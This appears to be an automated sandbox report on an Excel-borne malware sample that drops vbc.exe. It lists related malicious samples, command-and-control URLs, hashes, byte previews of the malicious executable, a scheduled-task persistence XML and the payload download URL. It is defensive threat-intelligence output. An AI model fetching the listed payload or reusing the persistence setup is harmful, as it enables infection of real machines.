                                                                                                                                                          17:24:13API Interceptor64x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                          17:24:16API Interceptor176x Sleep call for process: vbc.exe modified
                                                                                                                                                          17:24:20API Interceptor1x Sleep call for process: schtasks.exe modified
                                                                                                                                                          17:24:52API Interceptor507x Sleep call for process: wlanext.exe modified
                                                                                                                                                          17:25:22API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          160.153.136.3Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.aykassociate.com/csv8/?NP=7vK09KZl4LQms1AhK+FOWT/O0r2OTezMYsTnLZ7Ue+wg1oXew3wadIIcPVKEh3Ps02DbLw==&nN6l9T=K0GdGdPX7JyL
                                                                                                                                                          pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.fixmygearfast.com/csv8/?LJB=GbtlyLR0j&Rxl=bczMUAuRcAXUfehkBA3FaFpfgVKghqiBPuGiKAiKlgeMS/vW28KC3EFG84TL3J2NJly9
                                                                                                                                                          inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.instantcash4rvs.com/nki/?1bUh=FrGxVwTyCLL3Kve+OkX6jeyrik4vaK6OJzFvaN2wBjVO8mgvdWyeK6entW7nJ0JcDZWedA==&SDH=j8axx4mpFL
                                                                                                                                                          M.V. CHIANG TUN_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.executivehomeoffices.com/kna/?u6T8=/BgJXEchwc65ZyTxIhLGRHylAWTfFSY/7Tg+Hv7CnHOz4yFs7VdVpWNI2oIM3ag3p/Nkz44nCQ==&J6A=xPJpGXih
                                                                                                                                                          order no. 43453.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.inbox.ventures/0wdn/?1bw=L6A4n6n0CLA064Qp&xPJXwJsp=S12yqU0JllOsvqxv8CHeRyjx8YUubeRCUYvB6AsPyDP138vekCMRAfWn0U22Hvviw4Nv
                                                                                                                                                          0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.fixmygearfast.com/csv8/?rV0DPf=8pMPQ6&RRm=bczMUAuRcAXUfehkBA3FaFpfgVKghqiBPuGiKAiKlgeMS/vW28KC3EFG84fLkZ6OQ1yrtk3Ekw==
                                                                                                                                                          order (2021.01.05).exeGet hashmaliciousBrowse
                                                                                                                                                          • www.greenlightsuccesscoach.com/2kf/?nbfd=v5Yr4YgITThSTNEbg7NIfJS7gcTGz29li9lw+q5dOVE7EY9NCj3gAjM3pKgFhYWkuEQU&ZjoHR=VDKPWFx0BZmtIdA
                                                                                                                                                          Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.trumpvotr.com/heye/?D4f8=nfxjuzfz/EiGzYIGMY2S2ii+OI+SKikzT+SB+MDdKk4RDnMqiRsUK6CEyY5gsJCCCP/4&uDHX=NrThkj
                                                                                                                                                          Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.germantoolbox.com/nu8e/?DVldV=00aSs4+0c1UoIE5wO5HGKiMtjJDvBn3S5+E8Gh85H7GSw1fA93I8lNY01nj6ks+fLeXt/vI5ZQ==&lnPd=Txlhkdd
                                                                                                                                                          payment copy.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.physicianmedspa.com/s9zh/?Dzrpc=ZZL0mpThqt&KXfDz=O6KLmZpIQyLUaQVkZfIDl8vnRC+QC7QaFIFWwhpKLkzHNXq5yZ5u37YPOrVKlLUK5ib216ri7Q==
                                                                                                                                                          TN22020000560175.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.inbox.ventures/0wdn/?MR4ta=S12yqU0JllOsvqxv8CHeRyjx8YUubeRCUYvB6AsPyDP138vekCMRAfWn0XWMX+Paqfso&Vnt4B=-Zd0izgp5Bkt8FY
                                                                                                                                                          P.O-45.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.physicianmedspa.com/s9zh/?RHR=O6KLmZpIQyLUaQVkZfIDl8vnRC+QC7QaFIFWwhpKLkzHNXq5yZ5u37YPOo5a56Ix+Xyn&3f=YnOlnZfXtJb
                                                                                                                                                          Rfq_Catalog.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.successclickmg.com/nu8e/?X2MxoFW0=oyYKGSFYjAEVgv6eM1XFsxyoJdZlCypBLH2eqexNhJV07wFNRboEuXo5qiV7ceHDxsh9&Ezr=UVT8MhNhDdjl
                                                                                                                                                          AWBInvoice INA101970.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.trumpvotr.com/6bu2/?aflpdH=DkpFYzrH/pS1uuhPVQUXBnDXyHJf/0kuW+tvl44uXbn4yDauPbk4CbasFzejcK08gF16UQIRpw==&00G=qDKxZxixnRdXqZu
                                                                                                                                                          inv.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.trumpchangeofaddress.com/tabo/?uFQh=R7ugom5cegVyBZJ98i83BzG0aHlxrF9OY8G6EbH+spdqi1Sam5EFbtopnm3wNT1qswdX&CTvX=cvUhPfRP
                                                                                                                                                          NPD76122.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.oncuecollective.com/t052/?8pgDoFrP=1dc2WJQXsEya8hVIMvy89rYe7etRcmnSnNkjYke3CMr8WyS8GXubq4CfS/s43poVCj2E&q6A=Gbtly0jPM
                                                                                                                                                          scan_118637_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.thomasreany.com/p2he/?Lh0h=ZTypVLqp5&oPqpRL=u+Y9dopRHcPQ/vwghcUcyUVIKUpMOAeIY5p96wmmu40pEwlAPSWwZHqQOhbzFFbV8ECf73LepA==
                                                                                                                                                          h3dFAROdF3.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.rccarquibogota.com/jskg/?yTIDml=X6XHfZU8d&8pgD2lkp=cglIAc/AHXnvSHKnk/NPe3LL3zS/n17PGYpyUyyfGh1+2g1QbGkXEETKvam9VTo1I60k
                                                                                                                                                          YT0nfh456s.exeGet hashmaliciousBrowse
                                                                                                                                                          • www.aykassociate.com/csv8/?jFNHHj=7vK09KZg4MQislMtI+FOWT/O0r2OTezMYsL3XanVaewh1Z7Y3nhWLMweMzGCqGbnhQ3s&Ppd=_6g8yvxH-6HLN
                                                                                                                                                          LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • www.ondemandbarbering.com/bw82/?dZotnbmH=/uLN5+rz6Tt97hDEoOKXvxUOX9d2FCRa7e+MtK6cN7T3OLj7ozaH3+uXpMzRvYE3VPiI2g==&WFN0HX=qJE4

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          medicelcoolers.cnOrder_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          0000098.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          0009758354.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Purchase_Order_39563854854.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Order_009.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Companyprofile_Order_384658353.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 185.26.106.165
                                                                                                                                                          s.multiscreensite.comSKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.94.1
                                                                                                                                                          Companyprofile_Order_384658353.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          New Purchase Order 501,689$.exeGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          Scan_ 034 (1).exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.94.1
                                                                                                                                                          New Purchase Order 50,689$.exeGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          Eurobank Transaction.exeGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          S12GF803.exeGet hashmaliciousBrowse
                                                                                                                                                          • 100.24.208.97
                                                                                                                                                          ov9OYoVV1cgfF1z.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.94.1
                                                                                                                                                          33#U0443.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.94.1
                                                                                                                                                          73PO17072018.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.87.51
                                                                                                                                                          29Purchase order PO#578478847.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.224.237.194
                                                                                                                                                          stan.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.172.94.1
                                                                                                                                                          www.shemaledreamz.compHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.11.187.140
                                                                                                                                                          3Y690n1UsS.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.11.187.140
                                                                                                                                                          googlechrome_3843.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.11.187.140
                                                                                                                                                          hO3eV0L7FB.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.11.187.140
                                                                                                                                                          WpJEtP9wr0.exeGet hashmaliciousBrowse
                                                                                                                                                          • 45.11.187.140

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          GOOGLEUS13-01-21.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          NEW 01 13 2021.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          PO85937758859777.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          BankSwiftCopyUSD95000.pptGet hashmaliciousBrowse
                                                                                                                                                          • 108.177.127.132
                                                                                                                                                          Order_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          rB26M8hfIh.exeGet hashmaliciousBrowse
                                                                                                                                                          • 8.8.8.8
                                                                                                                                                          brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                                                                                                          • 216.239.34.21
                                                                                                                                                          WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                                                                                                                          • 108.177.126.132
                                                                                                                                                          PO#218740.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.98.99.30
                                                                                                                                                          20210111 Virginie.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          20210113155320.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          13012021.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                          • 35.204.150.5
                                                                                                                                                          6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                                                                                                          • 34.102.136.180
                                                                                                                                                          GODADDY-AMSDEOrder_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          inquiry10204168.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          M.V. CHIANG TUN_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          order no. 43453.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.87
                                                                                                                                                          0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.129.22
                                                                                                                                                          Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.129.22
                                                                                                                                                          PURCHASE ORDER-34002174.docGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.129.231
                                                                                                                                                          INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.116
                                                                                                                                                          order no. 3643.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.87
                                                                                                                                                          W08347.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.128.42
                                                                                                                                                          https://northernprepsquad.uk/wp-content/C2SgD76AFgrcENck0bAOmz8LMoQDQN9C8XlsS16BNPCVrzJBNs/Get hashmaliciousBrowse
                                                                                                                                                          • 160.153.138.177
                                                                                                                                                          order (2021.01.05).exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          Rfq 214871_TAWI Catalog.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          https://6354mortgagestammp.com/Get hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.212
                                                                                                                                                          rib.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          payment copy.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.136.3
                                                                                                                                                          TN22020000560175.exeGet hashmaliciousBrowse
                                                                                                                                                          • 160.153.133.87

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          No context

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file2[1].exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):582656
                                                                                                                                                          Entropy (8bit):7.865649202994036
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                                                                                                          MD5:92FF500A693078263908C83B4B290481
                                                                                                                                                          SHA1:FA5DCC6012C71490EFDF320791A90C7A18958A95
                                                                                                                                                          SHA-256:767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
                                                                                                                                                          SHA-512:8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Reputation:low
                                                                                                                                                          IE Cache URL:http://medicelcoolers.cn/file2.exe
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....*".(.....*..0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42642D43.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C6583CA.jpeg
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48770
                                                                                                                                                          Entropy (8bit):7.801842363879827
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                                                                                                                                          MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                                                                                                                                          SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                                                                                                                                          SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                                                                                                                                          SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                          Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD4B81AD.emf
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1099960
                                                                                                                                                          Entropy (8bit):2.015315251027675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:nXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:tahIFdyiaT2qtXw
                                                                                                                                                          MD5:739C90CC501B567B3583C7112965FBAE
                                                                                                                                                          SHA1:6CB98735B981DF53624CB291BA97008E6D6AA031
                                                                                                                                                          SHA-256:94D6F2541AA51338AD7D2E9D0E187A6E5F60755CDA6156E0E0F1F16D0EF80FBC
                                                                                                                                                          SHA-512:6346FD8EADEF5D52DD0B96186D1C5CB72EACC16802797A7372214702040025B41346FBBD88BE732BE0A2D57EE458EFD3B8D5C369237A0D0D6EA927F3F54E3E90
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................+...+.....d.+...+..N.Rd.+.\.+.......+.H.+..N.Rd.+.\.+. ....ySQ\.+.d.+. ............zSQ............................................X...%...7...................{ .@................C.a.l.i.b.r...............+.X...\.+...+..2LQ..........+...+..{JQ......+.....dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmp85C4.tmp
                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1625
                                                                                                                                                          Entropy (8bit):5.155104100520902
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJtn:cbhZ7ClNQi/rydbz9I3YODOLNdq35
                                                                                                                                                          MD5:7B767F4ADFBFE8B34E939F792715BA76
                                                                                                                                                          SHA1:1ECED80560CC6F7783F5CCE529757B204FABBFEE
                                                                                                                                                          SHA-256:8BF947EA2B775820BE78CB9B0358CAE4127D73F5DDCC54C2624FC4D9A4A9E0D5
                                                                                                                                                          SHA-512:FB7F99EADCBB15319336F1C00D04E88112C49111681ABC3FF6BA55822B361BF7C9EEC7F6489E52A359F0ACD08CE554ECCB8D02E33A9DF01AEA663EF1360456DA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                                                                                          C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe
                                                                                                                                                          Process:C:\Users\Public\vbc.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):582656
                                                                                                                                                          Entropy (8bit):7.865649202994036
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                                                                                                          MD5:92FF500A693078263908C83B4B290481
                                                                                                                                                          SHA1:FA5DCC6012C71490EFDF320791A90C7A18958A95
                                                                                                                                                          SHA-256:767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
                                                                                                                                                          SHA-512:8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.l...............0......(........... ........@.. .......................@............@.................................D...O........$................... ......(................................................ ............... ..H............text........ ...................... ..`.rsrc....$.......&..................@..@.reloc....... ......................@..B................x.......H...........\.......K...@K..............................................0..B........s.........(.......(.....(.......(....o.......s....(.......(.....*".(.....*..0..............r...p..(......9.........s........s ......8........a...%..=.o!.........o"...ri..p(#.......,q.....o"....(#.......,Z.+:....a...%..=.o!.........o"...r{..p(#.......,.......($...&...o%...%.r...po&..........-......o%...%........:L......&......o'........&.......+...*.......,......................0...........s(.
                                                                                                                                                          C:\Users\user\Desktop\~$Order_00009.xlsx
                                                                                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):330
                                                                                                                                                          Entropy (8bit):1.4377382811115937
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                          MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                          SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                          SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                          SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          C:\Users\Public\vbc.exe
                                                                                                                                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):582656
                                                                                                                                                          Entropy (8bit):7.865649202994036
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:fKNVSrQjhTHD1L3YhRr/3DRaRDt2eM2pB81ey:8VMyzDJYhRrFadt2c1
                                                                                                                                                          MD5:92FF500A693078263908C83B4B290481
                                                                                                                                                          SHA1:FA5DCC6012C71490EFDF320791A90C7A18958A95
                                                                                                                                                          SHA-256:767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
                                                                                                                                                          SHA-512:8478C8B88309D55C83AB4A5F3AF0367F19BB02A2B62DB4A790FF7E867AA0FFE422CD4D177BBD3AD25D19CD0049ED196EC3910A72C7E3935FED0991CC783F0D1D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
